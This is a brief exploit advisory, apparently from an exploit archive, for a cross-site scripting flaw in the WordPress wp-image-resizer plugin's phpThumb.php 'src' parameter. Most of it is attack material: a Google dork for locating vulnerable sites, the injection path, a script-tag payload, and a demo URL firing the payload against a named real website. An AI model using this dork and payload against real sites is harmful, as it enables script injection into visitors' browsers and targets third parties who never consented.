WordPress wp-image-resizer plugin suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
f3cd5381c497d0ff9a43ff787405d39f9cede357c30e3dde558ede2858e1aae0
#######################################################################
# Exploit Title : Wordpress wp-image-resizer Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content/plugins/wp-image-resizer/
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/10/16
#
#############################################
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/wp-image-resizer/thumb/phpThumb.php?src=[Xss]
#
#
# Script For Test : ?src=<Script>alert(/loool/)</Script>
#
##########################################
# Demo
#http://kellyludwig.com/govstumpys/wp-content/plugins/wp-image-resizer/thumb/phpThumb.php?src=%3CScript%3Ealert%28/test/%29%3C/Script%3E
##############
#
# Milad Hacking
#
# We Love Mohammad
#
##############